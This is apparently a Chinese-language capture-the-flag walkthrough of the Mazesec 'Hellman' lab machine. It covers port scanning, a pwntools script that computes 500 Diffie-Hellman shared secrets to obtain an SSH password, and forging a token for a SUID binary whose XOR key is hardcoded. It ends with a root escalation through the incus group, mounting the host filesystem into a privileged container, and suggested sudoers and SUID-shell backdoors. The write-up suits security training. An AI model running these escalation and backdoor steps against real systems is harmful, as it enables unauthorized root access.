Mazesec_Hellman

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 13:01 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00057s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00067s latency).
MAC Address: 08:00:27:71:57:99 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.60
Host is up (0.00094s latency).
MAC Address: 08:00:27:F2:61:32 (Oracle VirtualBox virtual NIC)
Stats: 0:00:07 elapsed; 255 hosts completed (3 up), 255 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.51 seconds

靶机IP：192.168.2.60

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.60                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 13:02 +0800
Nmap scan report for 192.168.2.60
Host is up (0.00063s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
MAC Address: 08:00:27:F2:61:32 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds

开放端口：22、80、1337

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,1337 192.168.2.60
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 13:02 +0800
Nmap scan report for 192.168.2.60
Host is up (0.0017s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp   open  http    nginx
|_http-title: Diffie-Hellman Challenge Guide
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, NULL: 
|     Alice has sent you her public key.
|     You've also been given your private key.
|     calculate your shared secret.
|     2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
|     39883204222858856918557640435344745890513425125290039851563654356835662268498
|     224638392781010346795674419563132197430625052467062663656728020806452536513319721055074207335278925919928267028716364525781824472324432672098280141614523807650997041044044996580695734531375627561478894572919232085682056248754553
|   GetRequest: 
|     Alice has sent you her public key.
|     You've also been given your private key.
|     calculate your shared secret.
|     2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
|     30659261933364259369132068323793156534865584845264382299796372358262839566253
|_    141857959155456004789209623147729647056961948062733887997137635919822708590999302708538583075539897493266262709687118908656475132467268775267767813200521394686273807598087086012147629209008628488571390034369609577109391080455020
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.98%I=7%D=1/27%Time=697846F4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,473,"Alice\x20has\x20sent\x20you\x20her\x20public\x20key\.\nYou've\x
SF:20also\x20been\x20given\x20your\x20private\x20key\.\nNow\x20calculate\x
SF:20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20=\x202410312426921032
SF:58855207602219756607485695054850245994265411694195810883168261222889009
SF:38582613416146732271414779040121965036489570505826319427307068050092230
SF:62734745341073406696246014589361659774041027169249453200378729434170325
SF:84377865919814376319377685986952408894019557734611984354530154704374720
SF:77499697637500843089263392955599688824578724129938101291302945929999479
SF:26365264059284647209730384947211681434464714438488520940127459844288859
SF:336526896320919633919\n\nb\x20=\x20398832042228588569185576404353447458
SF:90513425125290039851563654356835662268498\nA\x20=\x20224638392781010346
SF:79567441956313219743062505246706266365672802080645253651331972105507420
SF:73352789259199282670287163645257818244723244326720982801416145238076509
SF:97041044044996580695734531375627561478894572919232085682056248754553")%
SF:r(GenericLines,482,"Alice\x20has\x20sent\x20you\x20her\x20public\x20key
SF:\.\nYou've\x20also\x20been\x20given\x20your\x20private\x20key\.\nNow\x2
SF:0calculate\x20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20=\x202410
SF:31242692103258855207602219756607485695054850245994265411694195810883168
SF:26122288900938582613416146732271414779040121965036489570505826319427307
SF:06805009223062734745341073406696246014589361659774041027169249453200378
SF:72943417032584377865919814376319377685986952408894019557734611984354530
SF:15470437472077499697637500843089263392955599688824578724129938101291302
SF:94592999947926365264059284647209730384947211681434464714438488520940127
SF:459844288859336526896320919633919\n\nb\x20=\x20398832042228588569185576
SF:40435344745890513425125290039851563654356835662268498\nA\x20=\x20224638
SF:39278101034679567441956313219743062505246706266365672802080645253651331
SF:97210550742073352789259199282670287163645257818244723244326720982801416
SF:14523807650997041044044996580695734531375627561478894572919232085682056
SF:248754553")%r(GetRequest,482,"Alice\x20has\x20sent\x20you\x20her\x20pub
SF:lic\x20key\.\nYou've\x20also\x20been\x20given\x20your\x20private\x20key
SF:\.\nNow\x20calculate\x20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x2
SF:0=\x2024103124269210325885520760221975660748569505485024599426541169419
SF:58108831682612228890093858261341614673227141477904012196503648957050582
SF:63194273070680500922306273474534107340669624601458936165977404102716924
SF:94532003787294341703258437786591981437631937768598695240889401955773461
SF:19843545301547043747207749969763750084308926339295559968882457872412993
SF:81012913029459299994792636526405928464720973038494721168143446471443848
SF:8520940127459844288859336526896320919633919\n\nb\x20=\x2030659261933364
SF:259369132068323793156534865584845264382299796372358262839566253\nA\x20=
SF:\x201418579591554560047892096231477296470569619480627338879971376359198
SF:22708590999302708538583075539897493266262709687118908656475132467268775
SF:26776781320052139468627380759808708601214762920900862848857139003436960
SF:9577109391080455020");
MAC Address: 08:00:27:F2:61:32 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.52 seconds

二、WEB渗透

1、80端口

访问80端口提示我们是一个Diffie-Hellman Key Exchange，需要交换500次，使用自动化脚本进行，访问nc hellman.dsz 1337

三、Diffie-Hellman

使用nc访问1337端口

┌──(root㉿kali)-[~/miaosec]
└─# nc 192.168.2.60 1337                                          
Alice has sent you her public key.
You've also been given your private key.
Now calculate your shared secret.

g = 2
p = 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919

b = 51154570168425237012190187261208452554935228966342909476175478257010034448854
A = 1810096577306243736581942011207190129532077359040013432015086489684205815534398460549275846332291790537384649787817466650218512598949970197232507513372720069383980178553518222604140035165806150793414342893343137096664748831497856441434056477271196223931376386008074303053540618281394821915277589825901885193302437264716584784840559143099754318836327577637969351350571153233730788109044478376649815836540623348562572608183613314000872264170553433293147256838513298
 >

需要计算出共享钥，经过测试发现，第二轮之后只有b和A变了，使用AI写一个脚本

from pwn import *
import time

HOST = "192.168.2.60"
PORT = 1337
context.timeout = 10

io = remote(HOST, PORT)

def read_round1():
    """读取第1轮：需要 p, b, A"""
    p = b = A = None
    while p is None or b is None or A is None:
        line = io.recvline().decode().strip()
        print(f"[R1] {repr(line)}")
        if line.startswith("p = "):
            p = int(line.split("= ", 1)[1])
        elif line.startswith("b = "):
            b = int(line.split("= ", 1)[1])
        elif line.startswith("A = "):
            A = int(line.split("= ", 1)[1])
    return p, b, A

def read_next_round():
    """读取第2+轮：只需要 b, A"""
    b = A = None
    while b is None or A is None:
        line = io.recvline().decode().strip()
        print(f"[RN] {repr(line)}")
        if line.startswith("b = "):
            b = int(line.split("= ", 1)[1])
        elif line.startswith("A = "):
            A = int(line.split("= ", 1)[1])
        # 忽略其他行（包括空行、'> Correct!' 等）
    return b, A

# ===== Round 1 =====
print("[*] Round 1")
p, b, A = read_round1()
S = pow(A, b, p)
io.sendline(str(S).encode())
print("[+] Round 1 done\n")

# ===== Rounds 2–500 =====
for round_num in range(2, 501):
    print(f"[*] Round {round_num}")
    b, A = read_next_round()
    S = pow(A, b, p)
    io.sendline(str(S).encode())
    print(f"[+] Round {round_num} done")

# ===== Flag =====
flag = io.recvall(timeout=5).decode()
print("\n🎉 FLAG:")
print(flag)
io.close()

成功执行

....
[*] Round 500
[RN] '> Correct!'
[RN] ''
[RN] 'b = 42728238619645625108491187911580118051476472226993498679467817687962515190795'
[RN] 'A = 2391650150985810884994252685859052787801002187688383438918665064733694948779829365616769020651185586237016153481579544226505297708534405745415478700876478921519692405489708997678205836809697355276663326790382326219115224747787261227196132927251137819849881628026643338479934731670469291841859715749238574933045977981386216912009600066142619622484806914716407600488851876082111562196867608104366105761718540613179786077858885557393101122979407282875569450246185227'
[+] Round 500 done
[+] Receiving all data: Done (81B)
[*] Closed connection to 192.168.2.60 port 1337

🎉 FLAG:
 > Correct!

Congrats! Here's the flag: 676f643a6e756d626572735f6172655f68617264

得到字符串676f643a6e756d626572735f6172655f68617264

发现是hex编码，进行解码得到god:numbers_are_hard

四、获取到god权限

使用获取到的凭证成功登录

┌──(root㉿kali)-[~]
└─# ssh god@192.168.2.60     
The authenticity of host '192.168.2.60 (192.168.2.60)' can't be established.
ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:3: [hashed name]
    ~/.ssh/known_hosts:14: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.60' (ED25519) to the list of known hosts.
god@192.168.2.60's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Hellman:~$ id
uid=1001(god) gid=1001(god) groups=1001(god)

五、权限提升

1、获取water权限

查看suid文件

Hellman:~$ find / -perm -4000 -type f 2>/dev/null
/bin/bbsuid
/usr/libexec/dbus-daemon-launch-helper
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/secure_auth
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn

找到一个可疑的文件/usr/bin/secure_auth

执行一下

1 2	`Hellman:~$ /usr/bin/secure_auth Usage: /usr/bin/secure_auth <command> <token>`

需要两个参数，<command>执行的命令和<token>

将文件进行反编译，得到伪代码

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v4; // rdx
  char *s; // [rsp+10h] [rbp-120h]
  const char *s1; // [rsp+18h] [rbp-118h]
  char s2[264]; // [rsp+20h] [rbp-110h] BYREF
  unsigned __int64 v8; // [rsp+128h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  if ( argc > 2 )
  {
    s = (char *)argv[1];
    s1 = argv[2];
    xor_cipher(s, key, s2);
    v4 = strlen(s);
    if ( !memcmp(s1, s2, v4) )
    {
      puts("[+] Auth successful. Switching to UID 1002...");
      if ( setresgid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresgid failed");
      if ( setresuid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresuid failed");
      system(s);
    }
    else
    {
      puts("[-] Auth failed.");
    }
    return 0;
  }
  else
  {
    printf("Usage: %s <command> <token>\n", *argv);
    return 1;
  }
}

整体工作流程

用户运行程序：./secure_auth "command" "token"
程序用内置 key 对 "command" 做 XOR ，得到token1
将解密结果token1与 token 进行比较
如果匹配，则切换到 UID/GID 1002，并执行 "command"（注意这里传入的是字节流）

找到key=4b077130fw473r

xor_ciper函数

_BYTE *__fastcall xor_cipher(const char *a1, const char *a2, __int64 a3)
{
  _BYTE *result; // rax
  int i; // [rsp+24h] [rbp-Ch]
  int v6; // [rsp+28h] [rbp-8h]
  int v7; // [rsp+2Ch] [rbp-4h]

  v6 = strlen(a1);
  v7 = strlen(a2);
  for ( i = 0; i < v6; ++i )
    *(_BYTE *)(i + a3) = a2[i % v7] ^ a1[i];
  result = (_BYTE *)(v6 + a3);
  *result = 0;
  return result;
}

直接使用AI写一个脚本

// main.cpp
#include <iostream>
#include <cstring>
#include <cstdio>

typedef unsigned char BYTE;

// 更合理的函数签名：直接传输出缓冲区指针
BYTE* xor_cipher(const char* plaintext, const char* key, BYTE* output) {
    if (!plaintext || !key || !output) return nullptr;
    size_t len = strlen(plaintext);
    size_t key_len = strlen(key);
    if (key_len == 0) return nullptr;

    for (size_t i = 0; i < len; ++i) {
        output[i] = static_cast<BYTE>(plaintext[i] ^ key[i % key_len]);
    }
    output[len] = 0; // null-terminate as string
    return output + len;
}

int main() {
    const char* msg = "sh";
    const char* key = "4b077130fw473r";
    BYTE buffer[256] = {0};

    xor_cipher(msg, key, buffer);

    std::cout << "Encrypted bytes: ";
    for (size_t i = 0; i < strlen(msg); ++i) {
        printf("%02X ", buffer[i]);
    }
    std::cout << "\n";

    // 解密（XOR 是对称的）
    BYTE decrypted[256] = {0};
    xor_cipher(reinterpret_cast<const char*>(buffer), key, decrypted);
    std::cout << "Decrypted: " << decrypted << "\n";

    return 0;
}

结果为：Encrypted bytes: 47 0A ;Decrypted: sh

执行命令，成功切换到water用户 💡注：这里传入的token必须为字节流

Hellman:~$ /usr/bin/secure_auth "sh" $'\x47\x0a'
[+] Auth successful. Switching to UID 1002...
~ $ id
uid=1002(water) gid=1002(water) groups=1001(god)

2、获取root权限

查看/home/water目录下面的.ash_history

~ $ cat .ash_history 
incus
ls -l /var/lib/incus/unix.socket
addgroup god incus
exit

提示water用户已经加入到god、incus组

查看/etc/group

~ $ cat /etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin
adm:x:4:root,daemon
tty:x:5:
disk:x:6:root
lp:x:7:lp
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
cron:x:16:cron
audio:x:18:
cdrom:x:19:
dialout:x:20:root
ftp:x:21:
sshd:x:22:
input:x:23:
tape:x:26:root
video:x:27:root
netdev:x:28:
kvm:x:34:kvm
games:x:35:
shadow:x:42:
www-data:x:82:nginx
users:x:100:games
ntp:x:123:
abuild:x:300:
utmp:x:406:
ping:x:999:
nogroup:x:65533:
nobody:x:65534:
klogd:x:101:klogd
nginx:x:102:nginx
docker:x:103:
alice:x:1000:
god:x:1001:
messagebus:x:104:messagebus
dnsmasq:x:105:dnsmasq
incus:x:106:water
incus-user:x:107:
incus-admin:x:108:
water:x:1002:

发现incus:x:106:water，water用户已经加入到incus组里面

但是查看groups，却发现没有incus组 📌 Linux 权限判断以 id 或 groups 为准，不是 /etc/group 文本内容。

1 2	`~ $ groups water god`

需要重新刷新组权限（使 incus 组生效），但是无命令newgrp

需要通过SSH登录，强制刷新组权限（使 incus 组生效）在 water 用户目录下配置 SSH 私钥登录

在 water 的家目录中创建 .ssh 目录和 authorized_keys 文件
确保权限严格正确（SSH 对权限非常敏感）

1.创建 .ssh 目录

1 2	`~ $ mkdir -p ～/.ssh ~ $ chmod 700 ～/.ssh`

2.生成 SSH 密钥对

~ $ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/water/.ssh/id_ed25519): 
Created directory '/home/water/.ssh'.
Enter passphrase for "/home/water/.ssh/id_ed25519" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/water/.ssh/id_ed25519
Your public key has been saved in /home/water/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:exhBe72E5vvKS+l4uqLv1az0fj69P1em4k35750bGOo water@Hellman
The key s randomart image is:
+--[ED25519 256]--+
|        .        |
|       . . o     |
|        o + o    |
|         = . .   |
|        S . ..   |
|         * o. o.o|
|        = B. oo+.|
|      .o Oo.+ooo=|
|    .+o.==BE+oo*@|
+----[SHA256]-----+
~/.ssh $ cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAu1dBQbe0NtKrOil6Nf/Ns1sVSyTfMqD10duRXYaSMWwAAAJA3r0bkN69G
5AAAAAtzc2gtZWQyNTUxOQAAACAu1dBQbe0NtKrOil6Nf/Ns1sVSyTfMqD10duRXYaSMWw
AAAEDLh+s1vlGjZYfBFZOj3tDpgr5eQEhPHrqKyuOtEvX68y7V0FBt7Q20qs6KXo1/82zW
xVLJN8yoPXR25FdhpIxbAAAADXdhdGVyQEhlbGxtYW4=
-----END OPENSSH PRIVATE KEY-----

3.将公钥写入 authorized_keys

~/.ssh $ cat id_ed25519.pub >> ./authorized_keys
~/.ssh $ ls -la
total 24
drwx--S---    2 water    water         4096 Jan 28 17:32 .
drwxr-sr-x    5 water    water         4096 Jan 28 17:32 ..
-rw-------    1 water    water           95 Jan 28 17:32 authorized_keys
-rw-------    1 water    water          399 Jan 28 17:28 id_ed25519
-rw-------    1 water    water           95 Jan 28 17:28 id_ed25519.pub

4.设置严格权限

1
2
3

~/.ssh $ chmod 600 id_ed25519.pub 
~/.ssh $ chmod 600 id_ed25519
~/.ssh $ chmod 600 authorized_keys

使用私钥成功登录到water用户

┌──(root㉿kali)-[~/miaosec]
└─# ssh water@192.168.2.60 -i id
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Hellman:~$ id
uid=1002(water) gid=1002(water) groups=106(incus),1002(water)

发现用户water成功拥有了incus组权限

incus组提权

查看incus容器列表

1	`incus list`

1
2
3

incus init images:alpine/edge privesc
incus config set privesc security.privileged true
incus config device add privesc host-root disk source=/ path=/mnt/root recursive=true

启动容器

1	`incus start privesc`

进入容器，直接读写宿主机文件系统

incus exec privesc -- sh

# 在容器内：
# cd /mnt/root
# echo "god ALL=(ALL) NOPASSWD:ALL" >> etc/sudoers
# 或替换 /bin/bash 为 SUID shell
# cp bin/bash home/god/bash && chmod u+s home/god/bash
Hellman:~$  incus list
+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+
Hellman:~$ incus launch images:alpine/3.18/amd64 privesc -c security.privileged=true
Launching privesc
Error: Failed instance creation: Failed getting remote image info: Failed getting image: The requested image couldn t be found
Hellman:~$ incus init images:alpine/edge privesc
Creating privesc
Hellman:~$ incus config set privesc security.privileged true
Hellman:~$ incus config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
Hellman:~$ incus start privesc
Hellman:~$ incus exec privesc -- sh
~ # pwd
/root
/ # id
uid=0(root) gid=0(root)

六、查看FALG

/ # cd /mnt/root
/mnt/root # cat root/root.txt home/god/user.txt 
flag{root-da3397afd8ca24ea5bcaf7a2cb83b422}
flag{user-c9461249ea2e074a338b82db919b3fb9}

Maze-sec

#汇编 #Diffie-Hellman #XOR #提取-incus组

Mazesec_Hellman

http://miao-sec.github.io/Maze-sec/Mazesec-Hellman/

作者

Miao

发布于

2026年1月27日

许可协议

BY-MIAO

Vlx_Mux 上一篇

Mazesec_Happiness 下一篇